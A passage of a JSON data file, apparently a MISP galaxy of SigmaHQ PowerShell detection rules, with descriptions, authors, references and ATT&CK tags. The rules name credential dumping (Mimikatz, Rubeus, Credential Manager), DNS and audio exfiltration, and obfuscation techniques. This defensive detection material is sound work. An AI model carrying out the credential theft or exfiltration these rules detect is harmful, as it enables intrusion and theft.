"42821614-9264-4761-acfc-5772c3286f76", "value": "Root Certificate Installed - PowerShell" }, { "description": "Detects attempts of decoding a base64 Gzip archive in a PowerShell script. This technique is often used as a method to load malicious content into memory afterward.", "meta": { "author": "frack113", "creation_date": "2022-12-23", "falsepositive": [ "Legitimate administrative script" ], "filename": "posh_ps_frombase64string_archive.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=43", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_frombase64string_archive.yml" ], "tags": [ "attack.command-and-control", "attack.t1132.001" ] }, "related": [ { "dest-uuid": "04fd5427-79c7-44ea-ae13-11b24778ff1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "df69cb1d-b891-4cd9-90c7-d617d90100ce", "value": "Suspicious FromBase64String Usage On Gzip Archive - Ps Script" }, { "description": "Detects usage of the \"Get-AdGroup\" cmdlet to enumerate Groups within Active Directory", "meta": { "author": "frack113", "creation_date": "2022-03-17", "falsepositive": [ "Unknown" ], "filename": "posh_ps_get_adgroup.yml", "level": "low", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adgroup.yml" ], "tags": [ "attack.discovery", "attack.t1069.002" ] }, "related": [ { "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8c3a6607-b7dc-4f0d-a646-ef38c00b76ee", "value": "Active Directory Group Enumeration With Get-AdGroup" }, { "description": "utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer.\nThis behavior is typically used during a kerberos or silver ticket attack.\nA successful execution will output the SPNs for the endpoint in question.\n", "meta": { "author": "frack113", "creation_date": "2021-12-28", "falsepositive": [ "Unknown" ], "filename": "posh_ps_request_kerberos_ticket.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1558.003/T1558.003.md#atomic-test-4---request-a-single-ticket-via-powershell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_request_kerberos_ticket.yml" ], "tags": [ "attack.credential-access", "attack.t1558.003" ] }, "related": [ { "dest-uuid": "f2877f7f-9a4c-4251-879f-1224e3006bee", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a861d835-af37-4930-bcd6-5b178bfb54df", "value": "Request A Single Ticket via PowerShell" }, { "description": "Detects Commandlet names from ShellIntel exploitation scripts.", "meta": { "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "creation_date": "2021-08-09", "falsepositive": [ "Unknown" ], "filename": "posh_ps_shellintel_malicious_commandlets.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/Shellntel/scripts/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_shellintel_malicious_commandlets.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "402e1e1d-ad59-47b6-bf80-1ee44985b3a7", "value": "Malicious ShellIntel PowerShell Commandlets" }, { "description": "Detects potential exfiltration attempt via audio file using PowerShell", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-16", "falsepositive": [ "Unknown" ], "filename": "posh_ps_audio_exfiltration.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/gtworek/PSBits/blob/e97cbbb173b31cbc4d37244d3412de0a114dacfb/NoDLP/bin2wav.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_audio_exfiltration.yml" ], "tags": [ "attack.exfiltration" ] }, "uuid": "e4f93c99-396f-47c8-bb0f-201b1fa69034", "value": "Potential Data Exfiltration Via Audio File" }, { "description": "Adversaries may manipulate accounts to maintain access to victim systems.\nAccount manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups\n", "meta": { "author": "frack113", "creation_date": "2021-12-28", "falsepositive": [ "Legitimate administrative script" ], "filename": "posh_ps_localuser.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1098/T1098.md#atomic-test-1---admin-account-manipulate", "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.localaccounts/?view=powershell-5.1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_localuser.yml" ], "tags": [ "attack.persistence", "attack.t1098" ] }, "related": [ { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4fdc44df-bfe9-4fcc-b041-68f5a2d3031c", "value": "Powershell LocalAccount Manipulation" }, { "description": "Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.", "meta": { "author": "frack113", "creation_date": "2021-08-23", "falsepositive": [ "Admin script" ], "filename": "posh_ps_susp_win32_pnpentity.yml", "level": "low", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1120/T1120.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_win32_pnpentity.yml" ], "tags": [ "attack.discovery", "attack.t1120" ] }, "related": [ { "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b26647de-4feb-4283-af6b-6117661283c5", "value": "Powershell Suspicious Win32_PnPEntity" }, { "description": "Detects the use of PowerShell to identify the current logged user.", "meta": { "author": "frack113", "creation_date": "2022-04-04", "falsepositive": [ "Legitimate PowerShell scripts" ], "filename": "posh_ps_susp_get_current_user.yml", "level": "low", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-4---user-discovery-with-env-vars-powershell-script", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-5---getcurrent-user-with-powershell-script", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_current_user.yml" ], "tags": [ "attack.discovery", "attack.t1033" ] }, "related": [ { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4096a49c-7de4-4da0-a230-c66ccd56ea5a", "value": "Suspicious PowerShell Get Current User" }, { "description": "Detects the execution of the hacktool Rubeus using specific command line flags", "meta": { "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", "creation_date": "2023-04-27", "falsepositive": [ "Unlikely" ], "filename": "posh_ps_hktl_rubeus.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://blog.harmj0y.net/redteaming/from-kekeo-to-rubeus", "https://github.com/GhostPack/Rubeus", "https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_hktl_rubeus.yml" ], "tags": [ "attack.credential-access", "attack.t1003", "attack.t1558.003", "attack.lateral-movement", "attack.t1550.003" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f2877f7f-9a4c-4251-879f-1224e3006bee", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "7b211ac6-c815-4189-93a9-ab415deca926", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3245cd30-e015-40ff-a31d-5cadd5f377ec", "value": "HackTool - Rubeus Execution - ScriptBlock" }, { "description": "Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials.\nThese can be files created by users to store their own credentials, shared credential stores for a group of individuals,\nconfiguration files containing passwords for a system or service, or source code/binary files containing embedded passwords.\n", "meta": { "author": "frack113", "creation_date": "2021-12-19", "falsepositive": [ "Unknown" ], "filename": "posh_ps_susp_extracting.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_extracting.yml" ], "tags": [ "attack.credential-access", "attack.t1552.001" ] }, "related": [ { "dest-uuid": "837f9164-50af-4ac0-8219-379d8a74cefc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bd5971a7-626d-46ab-8176-ed643f694f68", "value": "Extracting Information with PowerShell" }, { "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", "meta": { "author": "frack113", "creation_date": "2021-12-20", "falsepositive": [ "Unknown" ], "filename": "posh_ps_dump_password_windows_credential_manager.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555/T1555.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_dump_password_windows_credential_manager.yml" ], "tags": [ "attack.credential-access", "attack.t1555" ] }, "related": [ { "dest-uuid": "3fc9b85a-2862-4363-a64d-d692e3ffbee0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "99c49d9c-34ea-45f7-84a7-4751ae6b2cbc", "value": "Dump Credentials from Windows Credential Manager With PowerShell" }, { "description": "Enumerates Active Directory to determine computers that are joined to the domain", "meta": { "author": "frack113", "creation_date": "2022-02-12", "falsepositive": [ "Unknown" ], "filename": "posh_ps_directorysearcher.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md#atomic-test-15---enumerate-domain-computers-within-active-directory-using-directorysearcher", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_directorysearcher.yml" ], "tags": [ "attack.discovery", "attack.t1018" ] }, "related": [ { "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1f6399cf-2c80-4924-ace1-6fcff3393480", "value": "DirectorySearcher Powershell Exploitation" }, { "description": "The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory.\nThese include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.\n", "meta": { "author": "frack113", "creation_date": "2022-02-06", "falsepositive": [ "Legitimate PowerShell scripts" ], "filename": "posh_ps_get_adreplaccount.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.006/T1003.006.md#atomic-test-2---run-dsinternals-get-adreplaccount", "https://www.powershellgallery.com/packages/DSInternals", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adreplaccount.yml" ], "tags": [ "attack.credential-access", "attack.t1003.006" ] }, "related": [ { "dest-uuid": "f303a39a-6255-4b89-aecc-18c4d8ca7163", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "060c3ef1-fd0a-4091-bf46-e7d625f60b73", "value": "Suspicious Get-ADReplAccount" }, { "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", "meta": { "author": "Timur Zinniatullin, oscd.community", "creation_date": "2020-10-13", "falsepositive": [ "Unknown" ], "filename": "posh_ps_invoke_obfuscation_via_var.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_var.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e54f5149-6ba3-49cf-b153-070d24679126", "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell" }, { "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", "meta": { "author": "Nikita Nazarov, oscd.community", "creation_date": "2020-10-09", "falsepositive": [ "Unknown" ], "filename": "posh_ps_invoke_obfuscation_via_use_clip.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_clip.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "db92dd33-a3ad-49cf-8c2c-608c3e30ace0", "value": "Invoke-Obfuscation Via Use Clip - Powershell" }, { "description": "Detects Silence EmpireDNSAgent as described in the Group-IP report", "meta": { "author": "Alina Stepchenkova, Group-IB, oscd.community", "creation_date": "2019-11-01", "falsepositive": [ "Unknown" ], "filename": "posh_ps_apt_silence_eda.yml", "level": "critical", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_apt_silence_eda.yml" ], "tags": [ "attack.execution", "attack.t1059.001", "attack.command-and-control", "attack.t1071.004", "attack.t1572", "attack.impact", "attack.t1529", "attack.g0091", "attack.s0363" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "ff73aa03-0090-4464-83ac-f89e233c02bc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3ceb2083-a27f-449a-be33-14ec1b7cc973", "value": "Silence.EDA Detection" }, { "description": "Adversaries may use to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.", "meta": { "author": "frack113", "creation_date": "2022-08-13", "falsepositive": [ "Unknown" ], "filename": "posh_ps_susp_new_psdrive.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-2---map-admin-share-powershell", "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/new-psdrive?view=powershell-7.2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_new_psdrive.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1c563233-030e-4a07-af8c-ee0490a66d3a", "value": "Suspicious New-PSDrive to Admin Share" }, { "description": "Detects execution of a PowerShell script that contains calls to the \"Veeam.Backup\" class, in order to dump stored credentials.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-04", "falsepositive": [ "Administrators backup scripts (must be investigated)" ], "filename": "posh_ps_veeam_credential_dumping_script.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://www.pwndefend.com/2021/02/15/retrieving-passwords-from-veeam-backup-servers/", "https://labs.withsecure.com/publications/fin7-target-veeam-servers", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_veeam_credential_dumping_script.yml" ], "tags": [ "attack.credential-access" ] }, "uuid": "976d6e6f-a04b-4900-9713-0134a353e38b", "value": "Veeam Backup Servers Credential Dumping Script Execution" }, { "description": "Detects technique used by MAZE ransomware to enumerate directories using Powershell", "meta": { "author": "frack113", "creation_date": "2022-03-17", "falsepositive": [ "Legitimate PowerShell scripts" ], "filename": "posh_ps_susp_directory_enum.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md", "https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_directory_enum.yml" ], "tags": [ "attack.discovery", "attack.t1083" ] }, "related": [ { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "162e69a7-7981-4344-84a9-0f1c9a217a52", "value": "Powershell Directory Enumeration" }, { "description": "Detects Commandlet names and arguments from the Nishang exploitation framework", "meta": { "author": "Alec Costello", "creation_date": "2019-05-16", "falsepositive": [ "Unknown" ], "filename": "posh_ps_nishang_malicious_commandlets.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/samratashok/nishang", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f772cee9-b7c2-4cb2-8f07-49870adc02e0", "value": "Malicious Nishang PowerShell Commandlets" }, { "description": "Detects powershell scripts that import modules from suspicious directories", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-07", "falsepositive": [ "Unknown" ], "filename": "posh_ps_import_module_susp_dirs.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_import_module_susp_dirs.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "21f9162c-5f5d-4b01-89a8-b705bd7d10ab", "value": "Import PowerShell Modules From Suspicious Directories" }, { "description": "DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel", "meta": { "author": "frack113", "creation_date": "2022-01-07", "falsepositive": [ "Legitimate script" ], "filename": "posh_ps_invoke_dnsexfiltration.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/Arno0x/DNSExfiltrator", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048/T1048.md#atomic-test-3---dnsexfiltration-doh", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_dnsexfiltration.yml" ], "tags": [ "attack.exfiltration", "attack.t1048" ] }, "related": [ { "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d59d7842-9a21-4bc6-ba98-64bfe0091355", "value": "Powershell DNSExfiltration" }, { "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs", "meta": { "author": "James Pemberton / @4A616D6573", "creation_date": "2019-10-24", "falsepositive": [ "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." ], "filename": "posh_ps_web_request_cmd_and_cmdlets.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/", "https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_web_request_cmd_and_cmdlets.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1139d2e2-84b1-4226-b445-354492eba8ba", "value": "Usage Of Web Request Commands And Cmdlets - ScriptBlock" }, { "description": "Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.", "meta": { "author": "Tim Rauch, Elastic (idea)", "creation_date": "2022-09-28", "falsepositive": [ "Mimikatz can be useful for testing the security of networks" ], "filename": "posh_ps_potential_invoke_mimikatz.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://www.elastic.co/guide/en/security/current/potential-invoke-mimikatz-powershell-script.html#potential-invoke-mimikatz-powershell-script", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_potential_invoke_mimikatz.yml" ], "tags": [ "attack.credential-access", "attack.t1003" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "189e3b02-82b2-4b90-9662-411eb64486d4", "value": "Potential Invoke-Mimikatz PowerShell Script" }, { "description": "Detects PowerShell calling a credential prompt", "meta": { "author": "John Lambert (idea), Florian Roth (Nextron Systems)", "creation_date": "2017-04-09", "falsepositive": [ "Unknown" ], "filename": "posh_ps_prompt_credentials.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://twitter.com/JohnLaTwC/status/850381440629981184", "https://t.co/ezOTGy1a1G", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_prompt_credentials.yml" ], "tags": [ "attack.credential-access", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ca8b77a9-d499-4095-b793-5d5f330d450e", "value": "PowerShell Credential Prompt" }, { "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-24", "falsepositive": [ "Rare intended use of hidden services", "Rare FP could occur due to the non linearity of the ScriptBlockText log" ], "filename": "posh_ps_susp_service_dacl_modification_set_service.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://twitter.com/Alh4zr3d/status/1580925761996828672", "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_service_dacl_modification_set_service.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.011" ] }, "related": [ { "dest-uuid": "17cc750b-e95b-4d7d-9dde-49e0de24148c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "22d80745-6f2c-46da-826b-77adaededd74", "value": "Suspicious Service DACL Modification Via Set-Service Cmdlet - PS" }, { "description": "Detects specific techniques often seen used inside of PowerShell scripts to obfscuate Alias creation", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-09", "falsepositive": [ "Unknown" ], "filename": "posh_ps_susp_alias_obfscuation.yml", "level": "low", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_alias_obfscuation.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1027", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e8314f79-564d-4f79-bc13-fbc0bf2660d8", "value": "Potential PowerShell Obfuscation Using Character Join" }, { "description": "Detects suspicious PowerShell invocation command parameters", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-03-12", "falsepositive": [ "Very special / sneaky PowerShell scripts" ], "filename": "posh_ps_susp_invocation_generic.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_invocation_generic.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ed965133-513f-41d9-a441-e38076a0798f", "value": "Suspicious PowerShell Invocations - Generic" }, { "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", "meta": { "author": "Timur Zinniatullin, oscd.community", "creation_date": "2020-10-18", "falsepositive": [ "Unknown" ], "filename": "posh_ps_invoke_obfuscation_via_compress.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_compress.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "20e5497e-331c-4cd5-8d36-935f6e2a9a07", "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell" }, { "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-11-17", "falsepositive": [ "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" ], "filename": "posh_ps_user_discovery_get_aduser.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_user_discovery_get_aduser.yml" ], "tags": [ "attack.discovery", "attack.t1033" ] }, "related": [ { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c2993223-6da8-4b1a-88ee-668b8bf315e9", "value": "User Discovery And Export Via Get-ADUser Cmdlet - PowerShell" }, { "description": 